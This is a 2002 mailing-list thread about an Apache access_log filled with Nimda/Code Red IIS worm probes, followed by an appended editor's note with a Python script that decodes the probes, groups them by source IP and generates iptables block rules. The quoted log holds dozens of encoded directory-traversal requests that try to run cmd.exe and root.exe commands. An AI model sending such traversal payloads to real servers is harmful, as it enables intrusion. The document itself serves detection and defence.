Re: access_log?


Subject: Re: access_log?
From: SFaulken (sfalken@citlink.net)
Date: Tue Jan 22 2002 - 22:11:57 MST


That's called an infected Microsloth IIS server; about all you can do is
start blocking the IPs, and report them to their ISPs if you're nice =]

                --SF

On Tuesday 22 January 2002 08:39, Jon wrote:
> I found something weird in my access log. I'm guessing someone here can
> tell me what's going on?
>
>
> Over and over again at different IPs... DoS?
> ===============
> 24.128.125.199 - - [20/Jan/2002:13:45:41 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
> 24.128.125.199 - - [20/Jan/2002:13:45:41 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
> 24.128.125.199 - - [20/Jan/2002:13:45:41 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.125.199 - - [20/Jan/2002:13:45:42 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.125.199 - - [20/Jan/2002:13:45:42 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.125.199 - - [20/Jan/2002:13:45:42 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.128.125.199 - - [20/Jan/2002:13:45:43 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.128.125.199 - - [20/Jan/2002:13:45:43 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
> 24.128.125.199 - - [20/Jan/2002:13:45:43 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.125.199 - - [20/Jan/2002:13:45:43 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.159.4.118 - - [20/Jan/2002:13:48:27 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
> 24.159.4.118 - - [20/Jan/2002:13:48:27 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
> 24.159.4.118 - - [20/Jan/2002:13:48:27 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.159.4.118 - - [20/Jan/2002:13:48:36 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
> 24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.159.4.118 - - [20/Jan/2002:13:48:46 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:11:50 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
> 24.128.57.12 - - [20/Jan/2002:14:11:53 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
> 24.128.57.12 - - [20/Jan/2002:14:11:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:14:12:00 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:14:12:04 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:12:07 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:14:12:10 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:14:12:13 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
> 24.128.57.12 - - [20/Jan/2002:14:12:17 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:12:20 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:12:24 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:12:27 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:12:31 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:14:12:34 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:14:12:38 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:12:41 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:28:01 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
> 24.128.57.12 - - [20/Jan/2002:14:28:05 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
> 24.128.57.12 - - [20/Jan/2002:14:28:09 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:14:28:13 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:14:28:16 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:28:20 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:14:28:24 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:14:28:28 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
> 24.128.57.12 - - [20/Jan/2002:14:28:31 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:28:35 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:28:39 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:28:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:28:45 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:14:28:49 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:14:28:53 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:28:56 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:36:23 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
> 24.128.57.12 - - [20/Jan/2002:14:36:27 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
> 24.128.57.12 - - [20/Jan/2002:14:36:31 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:14:36:35 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:14:36:38 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:36:42 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:14:36:45 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:14:36:49 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
> 24.128.57.12 - - [20/Jan/2002:14:36:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:36:59 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:37:03 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:37:06 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:37:10 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:14:37:13 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:14:37:17 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:37:21 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:15:20:04 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
> 24.128.57.12 - - [20/Jan/2002:15:20:07 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
> 24.128.57.12 - - [20/Jan/2002:15:20:11 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:17:03:25 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
> 24.128.57.12 - - [20/Jan/2002:17:03:28 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
> 24.128.57.12 - - [20/Jan/2002:17:03:32 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:17:03:35 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:17:03:39 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:17:03:42 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:17:03:45 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:17:03:49 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
> 24.128.57.12 - - [20/Jan/2002:17:03:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:17:03:56 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:17:03:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:17:04:03 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:17:04:06 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:17:04:09 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:17:04:12 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:17:04:16 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
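Editor's note, not part of the thread above: the sixteen-request sequence repeated for every source in Jon's log (root.exe, then cmd.exe reached through %255c, %c0%af, %c1%1c and the other double-encoded or overlong-UTF-8 spellings of "..\") is the probe set the Nimda worm sent to every host it scanned; root.exe is the copy of cmd.exe that Code Red II left behind and Nimda looked for. Every line answered 404 or 400, so nothing succeeded here. The script below is an added example, not code from the poster or this list: it parses Apache common-log lines, canonicalises each request path the way the targeted IIS decoder would (percent-decoding twice, then accepting overlong two-byte UTF-8) so that all sixteen spellings collapse to the same target, groups probes by source address, and emits the per-IP block rules the reply suggests. The lenient decoder, the four-probe threshold, the 192.0.2.10 benign line and the iptables rule shape are this example's assumptions; the other sample lines are copied from the quoted log.

```python
"""Spot Nimda-style IIS probe sequences in an Apache access_log and build a block list.

Added example, not part of the original thread.  Sample lines are copied from the
quoted access_log plus one constructed benign request; the thresholds, the rule
shape and the deliberately lenient decoder are this example's own assumptions,
modelled on the double-decode and overlong-UTF-8 flaws these probes target.
"""
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Apache common log format: ip ident user [timestamp] "METHOD path PROTO" status size
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" (?P<status>\d{3}) (?P<size>\S+)'
)

SAMPLE_LOG = """\
24.128.125.199 - - [20/Jan/2002:13:45:41 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
24.128.125.199 - - [20/Jan/2002:13:45:41 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
24.128.125.199 - - [20/Jan/2002:13:45:41 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.128.125.199 - - [20/Jan/2002:13:45:42 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.128.125.199 - - [20/Jan/2002:13:45:43 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
192.0.2.10 - - [20/Jan/2002:13:50:00 -0500] "GET /index.html HTTP/1.0" 200 1043
"""

WORM_THRESHOLD = 4  # distinct probe requests from one source; the real sequence has 16


def lenient_utf8(raw: bytes) -> str:
    """Decode bytes the way the vulnerable IIS decoder did: a 0xC0-0xDF lead byte is
    taken as a two-byte sequence without checking for an overlong form or a valid
    continuation byte, so %c0%af becomes '/' and %c1%1c / %c1%9c become '\\'."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))  # everything else is passed through byte-for-byte
            i += 1
    return ''.join(out)


def canonicalize(path: str) -> str:
    """Percent-decode twice (catches %255c, %25%35%63, %%35c), then apply the lenient
    UTF-8 decode, fold backslashes to slashes and lower-case the result."""
    raw = unquote_to_bytes(unquote_to_bytes(path))
    return lenient_utf8(raw).replace('\\', '/').lower()


def indicators(path: str) -> set:
    """Tags describing why a request path looks like an IIS worm probe (empty if benign)."""
    tags = set()
    once = unquote_to_bytes(path)
    canon = canonicalize(path)
    if 'cmd.exe' in canon:
        tags.add('cmd.exe')
    if 'root.exe' in canon:  # Code Red II's backdoor copy of cmd.exe
        tags.add('root.exe')
    if '/../' in canon:
        tags.add('traversal')
    # still percent-encoded after one pass, or non-ASCII bytes: an encoding evasion attempt
    if b'%' in once or any(b >= 0x80 for b in once):
        tags.add('encoded-traversal')
    return tags


def analyze(log_text: str) -> dict:
    """Group probe requests by source IP and classify each source."""
    per_ip = defaultdict(lambda: {'probes': 0, 'targets': set(), 'tags': set(),
                                  'statuses': set(), 'first': None, 'last': None})
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        tags = indicators(m['path'])
        if not tags:
            continue
        rec = per_ip[m['ip']]
        rec['probes'] += 1
        rec['tags'] |= tags
        rec['statuses'].add(int(m['status']))
        # resolve the decoded path to show what the probe was really aiming at
        rec['targets'].add(posixpath.normpath(canonicalize(m['path']).split('?', 1)[0]))
        rec['first'] = rec['first'] or m['ts']
        rec['last'] = m['ts']
    for rec in per_ip.values():
        scan = rec['probes'] >= WORM_THRESHOLD and {'cmd.exe', 'traversal'} <= rec['tags']
        rec['verdict'] = 'worm-scan' if scan else 'suspicious'
        rec['hit'] = any(s < 400 for s in rec['statuses'])  # a 2xx/3xx would mean a probe worked
    return dict(per_ip)


def block_rules(report: dict) -> list:
    """One iptables DROP rule per source classified as a worm scan (rule shape assumed)."""
    return [f'iptables -I INPUT -s {ip} -j DROP'
            for ip, rec in sorted(report.items()) if rec['verdict'] == 'worm-scan']


if __name__ == '__main__':
    report = analyze(SAMPLE_LOG)
    for ip, rec in report.items():
        print(f"{ip}: {rec['verdict']} probes={rec['probes']} hit={rec['hit']} "
              f"targets={sorted(rec['targets'])} {rec['first']} .. {rec['last']}")
    print('\n'.join(block_rules(report)))
```

Run against the full log, every source in the quoted excerpt comes out as worm-scan with hit=False, and the canonical form of all the %255c / %c0%af / %c1%1c / %%35c variants is the same "/scripts/../../winnt/system32/cmd.exe", which is why matching on the decoded path rather than on the raw bytes is what keeps a detection rule from needing sixteen signatures. The hit flag is the check worth keeping even on a non-IIS server: a status below 400 on any of these lines means a probe actually found something.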



This archive was generated by hypermail 2a24 : Tue Jan 22 2002 - 22:14:55 MST